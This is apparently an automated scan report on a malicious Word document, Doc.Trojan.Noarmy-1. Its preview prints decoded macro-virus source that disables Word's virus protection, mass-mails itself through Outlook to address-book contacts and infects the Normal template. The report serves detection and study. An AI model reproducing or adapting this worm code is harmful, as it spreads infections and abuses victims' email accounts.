Verdict: MALICIOUS (Risk Score: 270)

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1566.001 Spearphishing Attachment
The sample contains a high-confidence detection for an obfuscated auto-exec VBA loader within the Document_Open macro. This macro utilizes CreateObject and appears to be designed to download and execute a second-stage payload from one of the embedded URLs. The presence of the 'Doc.Trojan.Noarmy-1' ClamAV detection further supports its malicious nature.
Heuristics (8)

- ClamAV: Doc.Trojan.Noarmy-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Noarmy-1
- VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access)
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://sn.agat.net (In document text (OLE body))
  - http://altern.org/gigm/service.htm (In document text (OLE body))
  - http://www.donquichotte.com (In document text (OLE body))
  - http://www.multimania.com/antisn (In document text (OLE body))
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 124653 bytes |

SHA-256: f146233cc75d30f0a8e5ab4eba99f3774c7d72de1568ad90250040477f1d724f

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "NOSN" Attribute VB_Base = "1Normal.NOSN" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Dim h7, g8, j1, k2, j8, l1, m5, l8, a5, _ d3, g6, h3, k1, k5, g3, n6, h5, j5, k7: Dim e8, b9, a7, d6, c5, e2, g1, l3, l9, n2, m1, h8, l5, i1, i7, e4, c7, _ c4, f3, h1, d8: Dim g5, _ e1, m4, b3, d4, f7, i3, g2, e5, d2, a4, a3, a2, c2, d1, c3, c1, b2, b1, a1 ' nrotylgytee Private Sub Document_Open() ' vkljft On Error Resume Next: Call f1 ' aqbapxoroqvwzkm Call f2 ' ufuv Randomize: Select Case System.PrivateProfileString(j1, k2, j8) ' sneftrzdxprdbwr Case Is <> j1 ' prnzbaoycly System.PrivateProfileString(j1, k2, j8) = 1&: Case Else ' qpawhteutgnjmx Options.ConfirmConversions = m5 ' piohsrspwkfgtl Options.VirusProtection = m5 ' wxdqxnlngwqnwmk Options.SaveNormalPrompt = m5: End Select: d8 = a5: Set c4 = CreateObject(d8) ' lhsjauxfiizadnw Set f3 = c4.GetNameSpace(l8): Select Case System.PrivateProfileString(j1, d3, g6): Case Is <> h3: Select Case c4 ' pokieyiqafb Case k1: f3.Logon k5, g3 ' fzwsekvovjumwzq For i = 1 To f3.AddressLists.Count: Set g4 = f3.AddressLists(i) ' grkcmgai Set h1 = c4.CreateItem(m5): h2 = g4.AddressEntries.Count ' bgguzxq b6 = m5 ' kvkfpkqyipjdtp For j = 1 To h2: Set j2 = g4.AddressEntries(j): Select Case Len(j2.Address): Case Is _ > 4: Select Case InStr(Len(j2.Address) - 3, j2.Address, n6, vbTextCompare) ' ofynhrtrmkzblo Case Is <> 0 ' yoiniqmfzsojoyd h1.Recipients.Add j2 ' iszxzsknurq b6 = b6 + 1 ' wcwhhxegwg End Select: End Select ' slgc Select Case b6 ' jgvra Case 50 ' hychgo Exit For: End Select: Next j: Select Case Rnd(): Case Is < 0.33: h1.Subject = h5: h1.Body = j5 ' utrnojfdfgkjnn Case Is < 0.66 ' roeeusoapnne h1.Subject = g1 ' fuqjqdkgvcaufh h1.Body = l3 ' avkjbahnlsaey Case Else: h1.Subject = l9 ' elnelxuumd h1.Body = n2 ' scqzhty End Select: h1.Attachments.Add ActiveDocument.FullName ' cmtzpngqeei h1.Send: Next i ' 
ozojl f3.Logoff: End Select ' smtgixupguodf System.PrivateProfileString(j1, d3, g6) = h3: End Select ' uiyawfv Set n1 = ActiveDocument.VBProject: Set i6 = _ n1.VBComponents.Item(1): Set n1 _ = NormalTemplate.VBProject ' mvuhefepx Set k3 = n1.VBComponents.Item(1): i2 = False: Select Case InStr(1, ActiveDocument.Name, m1): Case False: Select Case i6.Name ' jxddlhfccxxy Case Is <> g6: Set b5 _ = k3: Set f5 = i6 ' gpzhxnymenrjryx i2 = True ' fpjqqebpytzw End Select: End Select: Select Case k3.Name ' cothmb Case Is <> g6 ' mxivvkgror Set b5 = i6: Set f5 = k3 ' pbpxygqemywws i2 = True ' gvwfzszvm End Select ' lfjonjgiz Select Case i2: Case True: i4 _ = b5.CodeModule.CountOfLines - 1 ' wynohjmgwcg c8 = f5.CodeModule.CountOfLines: Select Case c8 ' iadcnub Case Is > _ 0: f5.CodeModule.DeleteLines 1, c8: End Select ' iove c6 = 1 ' lthq c9 = "": j3 = "": a6 = 0 ' dysxmghewoelr For l2 = 1 To i4: h4 = b5.CodeModule.Lines(l2, 1) ' ctbh i = 1 ' acihnxfteblgde f4 = InStr(1, h4, Chr(39)) ' mixzjqj Select Case f4 ' kjhxbtokwotut Case 0 ' tcclf f4 = Len(h4): Case Else ' gkobo f4 = f4 - 2: End Select: Do ' qyrbbyfgqzzne j = InStr(i, h4, Chr(32)): Select Case j ' npevw Case 0: j = Len(h4) + 1 ' bhrujzdylhzo b8 = True ' pyjcogbhesuf Case f4 + 1: b8 = True ' lwlhje Case Else ' ertgcioslly b8 = False ' biljksmdqismt End Select: n5 = Mid(h4, i, j - i) ' czrvaeobz Select Case b8: Case True ' bdgxftgmxphz f6 = b5.CodeModule.Lines(l2 + 1, 1) ' piknl k4 = InStr(1, f6, Chr(32)) ' dkateku Select Case k4: Case 0: j3 = _ "": Case Else ' vkigfkzl j3 = Mid(f6, 1, k4 - 1) ' bzto End Select: End Select ' kkxeqbhjgvg Select Case n5: Case k7 + Chr(58): n5 = e8 + Chr(58): Case e8 + Chr(58) ' kmonhjq n5 = k7 + Chr(58) ' ykaewtxctjnfu Case k7 ' mmuwski n5 = e8: Case e8 ' rdyimwntbzzdup n5 = k7 ' pfovdg End Select ' izqznso Select Case h6: Case False: Select Case Rnd() ' pxmytuxrzhbjpm Case Is _ < 0.02: h6 = True ' vuouikpjyvqki Case Else ' bxumhidsun h6 = False: Select Case b8: Case True ' ximlosne Select 
Cas ... (truncated)